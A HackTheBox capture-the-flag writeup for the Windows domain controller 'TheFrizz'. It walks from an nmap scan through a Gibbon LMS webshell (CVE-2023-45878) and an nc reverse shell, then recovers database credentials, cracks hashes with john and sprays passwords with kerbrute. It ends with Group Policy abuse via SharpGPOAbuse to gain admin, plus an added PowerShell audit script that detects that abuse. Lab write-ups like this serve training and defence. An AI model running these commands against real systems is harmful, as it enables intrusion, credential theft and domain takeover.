HTB Writeup: TheFrizz

Information gathering

nmap -sV -sC -O 10.10.11.60

Nmap scan report for 10.10.11.60
Host is up (0.63s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h40m55s
| smb2-time: 
|   date: 2025-04-06T16:59:55
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.30 seconds

CVE-2023-45878

There is a web service (Gibbon LMS). Searching turns up a CVE that allows reading the SQL file:
http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql
That was no use. Kept searching and found CVE-2023-45878, which can be used to write a webshell.
Connected with AntSword, uploaded nc.exe and got a reverse shell.
net user /domain

a.perlstein
Administrator
c.ramon
c.sandiego
d.hudson
f.frizzle
g.frizzle
Guest
h.arm
J.perlstein
k.franklin
krbtgt
l.awesome
m.ramon
M.SchoolBus
p.terese
r.tennelli
t.wright
v.frizzle
w.li
w.Webservice

mysql

Read config.php to get the MySQL credentials:

$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';

Used frp to forward port 3306 out, connected with Navicat, and read the gibbonperson table to get the password hash and salt:
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
Cracked it with john:
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
Got the password: ***********
Port 5985 is not open, so WinRM login is not possible; instead, obtain a Kerberos ticket for f.frizzle and log in over SSH.

Kerberos authentication

Edit /etc/krb5.conf:

[libdefaults]
    default_realm = FRIZZ.HTB

# The following krb5.conf variables are only for MIT Kerberos.
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true
    rdns = false

# The following libdefaults parameters are only for Heimdal Kerberos.
    fcc-mit-ticketflags = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
        default_domain = frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

Run kinit f.frizzle@FRIZZ.HTB to request a ticket.
Run klist to view the ticket.
ssh f.frizzle@frizz.htb -K logs in with the ticket; read desktop/user.txt.

bloodhound

BloodHound kept timing out, damn it, so I had to upload SharpHound.exe and collect on the box, which was painfully slow; in the end I sent the zip archive back to Kali over nc.
Analysed f.frizzle's domain relationships: nothing at all. Useless user. Found a zip archive in the Recycle Bin.
Transferred it over nc (another long wait), extracted it and searched for a password.
grep -IR "wapt_password". Why search for that? Because that is the file name; searching for just "password" returns far too many hits.
Got the password: !suBcig@MehTed!R
Password-sprayed it: kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
It belongs to M.SchoolBus; SSH in.
This environment is a mess, so from here on I will just describe the approach. Check M.SchoolBus's relationships in BloodHound.
M.SchoolBus is a member of the Group Policy Creator Owners (GPCO) group, which means M.SchoolBus can perform GPO abuse: create a malicious GPO to escalate privileges.

# Create the malicious GPO
New-GPO -Name "hacker"
# Link the GPO to the Domain Controllers OU
New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
# Use the GPO to add M.SchoolBus to the local Administrators group on the DC
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
# Force a Group Policy refresh
gpupdate /force
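From the defender's side, the chain above (a Group Policy Creator Owners member creating a GPO and linking it to the Domain Controllers OU) is easy to audit. The following PowerShell script is an added example, not part of the original writeup; it assumes the RSAT GroupPolicy and ActiveDirectory modules and a domain account with read access to GPOs, and the Domain Controllers OU DN and the FRIZZ\ owner prefix are taken from this box.

```powershell
# Added audit example (not from the original writeup). Assumes RSAT's
# GroupPolicy and ActiveDirectory modules and read access to the domain.
Import-Module GroupPolicy
Import-Module ActiveDirectory

$dcOU = "OU=Domain Controllers,DC=frizz,DC=htb"                        # from this box
$trustedOwners = @("FRIZZ\Domain Admins", "FRIZZ\Enterprise Admins")  # assumption

# 1. Who is allowed to create GPOs at all? Every member here can start
#    the chain shown above, so this group should be empty or tightly held.
Write-Host "== Group Policy Creator Owners =="
Get-ADGroupMember -Identity "Group Policy Creator Owners" -Recursive |
    Select-Object SamAccountName, objectClass | Format-Table -AutoSize

# 2. Which GPOs are linked to the Domain Controllers OU, who owns them,
#    and when were they last changed?
$links = (Get-GPInheritance -Target $dcOU).GpoLinks | ForEach-Object {
    $gpo = Get-GPO -Guid $_.GpoId
    [pscustomobject]@{
        Name     = $gpo.DisplayName
        Owner    = $gpo.Owner
        Created  = $gpo.CreationTime
        Modified = $gpo.ModificationTime
        Enabled  = $_.Enabled
        Enforced = $_.Enforced
    }
}
Write-Host "== GPOs linked to $dcOU =="
$links | Sort-Object Modified -Descending | Format-Table -AutoSize

# 3. A GPO is owned by whoever created it. A GPO on the DC OU owned by a
#    regular user (e.g. FRIZZ\M.SchoolBus) or changed in the last day is
#    exactly what the abuse above leaves behind, so flag it for review.
$recent = (Get-Date).AddDays(-1)
$links | Where-Object {
    ($trustedOwners -notcontains $_.Owner) -or ($_.Modified -gt $recent)
} | ForEach-Object {
    Write-Warning ("Review GPO '{0}': owner {1}, modified {2}" -f `
        $_.Name, $_.Owner, $_.Modified)
}
```

Run it on a schedule (or after any Group Policy change alert) and treat every warning on the Domain Controllers OU as an incident until someone explains it.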

Done.

posted @ 2025-04-07 16:53  F12~